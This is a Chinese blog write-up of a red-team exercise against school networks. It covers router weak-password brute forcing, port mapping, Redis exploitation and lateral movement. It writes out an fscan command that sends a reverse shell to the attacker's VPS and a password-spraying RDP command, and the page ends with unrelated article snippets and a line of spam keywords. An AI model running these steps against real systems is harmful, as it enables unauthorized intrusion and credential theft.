<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    『攻防』記一次EDU攻防演練

    VSole2022-07-29 16:36:27

    背景

    記一次EDU攻防,來之前還是有點慫的,因為前段時間剛打了其它地方EDU感受了一波,小部分目標有重合好難打啊(Too vegetable),不是很正式的感覺隊伍也不多,目標分下來混戰打,拿到目標表一看。

    我敲了一大半的內網地址大部分都是些視頻監控系統

    信息收集

    拿到目標表之后就是信息收集了,挑了幾個目標fscan快速識別一波資產沒啥東西呀,web頁面有個內網地址泄露記一下,可以確定這個ip是在服務器段的,我還沒進去內網呢要這破ip干嘛

    上超級弱口令檢測工具掃一波弱口令,telnet口令爆破到一個h3c設備口令,成功登陸到設備是個管理員權限,開啟web訪問看了下有ssl vpn功能和授權,那么可以直接建ssl vpn把內網打通。

    菜狗不會配啊,只有抓苦力找L師傅給我看看了

    白嫖L師傅干活給了個設備型號讓他去翻一波手冊,吃完飯回來L師傅很自信跟我說你的需求我清楚了不就把內網放出來嘛(簡簡單單),L師傅遠程我電腦telnet命令行配置界面敲下神秘代碼(高手高手),然后piapia打臉哈哈哈

    設備太老了第一條命令就配不上,網上能找到的手冊都是命令行配置,web界面配置L師傅看了半天也沒整起,ssl vpn端口是通了但是連不上啊,吐槽了一波L師傅不靠譜,piapia打臉的L師傅試圖解釋一波(這設備出廠我都還在上初中怎么這設備還不退市啊),浪費一個小時時間沒搞出來已經晚上一點了,睡覺吧明天找c師傅幫忙看看。

    第二天找c師傅看了一下也搞不上敲了這下咋辦啊,設備有telnet、ping功能,看了下設備上路由表確定了有2、3、5、6網段,telnet測試了一波網段一頭一尾的IP,根據端口開放情況確定了2網段都是些服務器、3網段沒法確定、5網段應該也是部分服務器段還有些無線ap設備。

    通過telnet登陸到5網段的無線AP,可以執行部分命令,如ifconfig、ps -aux,其它命令都被屏蔽了,web界面比較簡單沒有什么功能,沒有找到相關的漏洞。

    翻了下官網的產品手冊,看到一個無線網關的設備手冊里面功能有vpn功能,那如果能找到這個無線網關設備不就可以做個vpn了嗎

    找了一圈沒找到無線網關,放棄了,還是想想其他辦法吧。現在我們手上有外網路由器的管理權限還有內網無線ap的權限,外網路由器可以telnet、ping探測IP和端口存活、nat端口映射。

    那現在我們只有笨方法了,試試運氣去探測內網的脆弱端口如22、1433、3389、6379、7001,說干就干,之前在信息收集的時候確定了靶標IP段在2段,那么我們直接按照靶標的IP前后去探測上面的脆弱端口,如果端口開放那么我們就在路由器上做個映射到公網上面。

    簡單探測了一波22端口寫好nat配置到路由器上面先爆破一下

    突破口

    人麻了,一個弱口令都沒有,IP繼續往前推探測6379端口,發現一個redis服務。

    總算找到一個可以打的端口,這里在華三路由器telnet過去我不知道為啥我輸入info沒有返回未授權的信息,映射到外網輸入info是直接返回未授權,直接端口映射到外網直接用fscan打一下。

    蕪湖,fscan創建個計劃任務彈到vps上面。

    fscan_amd64.exe -h *.*.*.* -p 6379 -rs *.*.*.*:1234
    

    等待獲取到shell

    蕪湖,沖沖沖

    內網橫向

    拿到了內網機器權限,直接開沖,先上一波fscan撞一波之前我們收集到的密碼。

    fscan_amd64.exe -h *.*.*.*/16 -pa 3389 -pwd ***** -np
    

    運氣比較好,撞密碼撞到了兩個機器,上個向日葵rce繼續沖。

    內網翻出來一堆向日葵rce,能正常執行命令的就一臺,難受了呀,powershell上線到cs上面,加賬號遠程到服務器,常規操作翻文件、瀏覽器密碼、找內網管理員IP這些。

    數據庫賬號,成功連接到數據庫。

    QQ文件里面有向日葵遠程碼,可惜了連接不上。

    在日志里面看登陸日志確定管理員IP,探測了下管理員地址不在線,上線另外兩個rdp爆破出來的機器,瀏覽器保存了上網行為管理密碼,直接登陸到后臺了。

    剛才fscan掃描出一些交換機設備,嘗試用同樣的密碼登陸,拿到了8臺交換機權限。

    網絡設備分數上限2k,之前無線ap已經把分數打滿了,交了也是白交,繼續看靶標系統和虛擬化平臺,沒有一個能可以打的,剛才的設備萬能密碼也沒用。

    kscan再掃描下,發現一些應該是移動終端設備,adb直接連接上去大概60臺左右算物聯網分數上限直接滿了,靶標拿不下難受啊,就這樣吧交報告溜了溜了。

    總結

    這次攻防整體的反思,外網打點信息收集盡量寬泛仔細一些,在現場打壓力還是大的打不出來東西就是在坐牢,和隊伍里師傅第一次協作不是很好沒有溝通好打哪個目標好點,師傅第一次打也很懵逼,我打的多之前都是旁邊輔助混子哈哈哈,信息同步還是比較重要的,內網橫向這塊還得學啊太菜了太菜了,還有就是免殺和bypass av跟師傅們學了一波姿勢,之前沒弄過上不了線真是一臉懵逼,最后差個幾千分結束了。

    文章里面這個目標案例打的也不是像我寫的這么順利,在測試脆弱端口的時候人麻了,測試了有個一個多小時一個能打的都沒有,中午去吃飯路上都想著回來寫python腳本做telnet批量測試,吃飯回來坐在那擺爛隨便測了下結果測出個redis未授權才撕開了一個口子。

    還有就是打的時候一定不能把自己軸進去了,一定要多跟隊伍里師傅溝通想法怎么做,多個人多種思路,一個點上浪費了太多時間一定要及時調整尋找其它突破點,這個在突破到內網那里我就很軸,當時我就想把ssl vpn建立起來但是就是建立不起來,c師傅喊我換個思路把端口映射出來打,最后想想確實在ssl vpn那塊浪費太多時間,一定及時調整自己思路。

    路由網段
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    最終ARP請求會被轉發到同一網絡中的所有客戶機上。ARP廣播,是在需要與其他主機通信時發出的。IEEE 802.1Q協議規定,在以太網數據幀的目的MAC地址和源MAC地址字段之后、協議類型字段之前加入4個字節的VLAN標簽,用以標識VLAN信息。表示幀類型,取值為0x8100時表示IEEE 802.1Q的VLAN數據幀。PRI3bitPriority,表示數據幀的802.1p優先級。CFI取值為0表示MAC地址以標準格式進行封裝,為1表示以非標準格式封裝。為了提高處理效率,設備內部處理的數據幀一律都是Tagged幀。
    路由器能隔絕廣播,那要VLAN有什么用,既配置了VLAN又劃分在不同的網段是不是有些多余了?題主的意思是不要
    接收后檢查該數據幀,將IP數據包從幀中提取出來,交給本機的IP層協議。同樣,IP層檢查后,將有用的信息提取后交給ICMP協議,后者處理后,馬上構建一個ICMP應答包,發送給主機A,其過程和主機A發送ICMP請求包到主機B一模一樣。我們來看下,ping同網段不存的ip地址。
    優先修復發現的漏洞大多數CRQ公式使用CVE CVSS分數作為判定漏洞修復優先級的基礎。該站點應用程序僅受網絡防火墻和網絡IPS解決方案的保護。在Log4J漏洞利用公布后,IPS解決方案并沒有立刻提供任何針對Log4J漏洞的保護。不過,大多數主流IPS解決方案供應商都在漏洞利用發布24小時內發布了產品更新。也就是說,區域內CRQ主機值等于網絡CRQ值。區域間CRQ主機值可以通過將CRQ基值乘以1來計算,因為沒有實施基于主機的安全控制。
    車載防火墻是針對城市軌道交通車載TCMS系統和信號系統等設計開發的邊界隔離和安全防護產品。產品采用工業級ARM多核處理器芯片的硬件架構和自主知識產權的智能工控安全操作系統(IICS-OS),基于優化的軟硬件架構提高報文的處理能力,對主流工業協議進行深度報文解析(DPI,Deep Packet Inspection),運用“白名單+智能學習”技術建立車載數據通信及車載控制網絡區域間通信模型,保證只
    內網滲透在現在已經是非常熟悉的攻擊方法本篇文章將使用viper進行內網滲透靶場環境來自:西域大都護府CFS內網滲透靶場。滲透之前,先說說viper是什么?話不多說,直接上。
    內網滲透-代理篇
    2021-12-01 05:44:01
    利用代理工具將內網的流量代理到本地進行訪問,這樣就可以對內網進行下一步滲透,同時也可以利用代理工具將其他網段的流量轉發到本地進行縱向滲透。代理的本質是Socks協議(防火墻安全會話轉換協議),工作在OSI參考模型的第5層(會話層)。使用TCP協議傳輸數據,因而不提供如傳遞ICMP信息之類的網絡層相關服務。目前支持SOCKS4和SOCKS5兩個版本:
    本文將引入一個思路:“在 Kubernetes 集群發生網絡異常時如何排查”。文章將引入 Kubernetes 集群中網絡排查的思路,包含網絡異常模型,常用工具,并且提出一些案例以供學習。其可能原因為Pod 的 DNS 配置不正確DNS 服務異常pod 與 DNS 服務通訊異常大數據包丟包:主要現象為基礎網絡和端口均可以連通,小數據包收發無異常,大數據包丟包。
    數年前,農業銀行在總行層面規劃和建設了VXLAN DCI(Datacenter Interconnect)網絡核心,將內外網Fabric資源池通過DCI高速互聯,并采用原創的多段式VXLAN和兩級外部網絡技術,實現跨Fabric的邏輯分區、資源調度及服務鏈功能,為云原生應用提供超大規模的網絡資源池。該架構業已成為大型金融數據中心網絡的最佳實踐和事實標準,被同業廣泛采用。
    對于一個安全保護等級為第三級的網絡來說,如果目標設備(如網絡設備、安全設備、主機操作系統、應用系統等)僅提供基于靜態口令的用戶身份鑒別方式,但對應的集中運維管理系統采用雙因素鑒別方式,那么該目標設備是否也可判定為滿足第三級身份鑒別1控制點中對于組合鑒別技術的要求?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类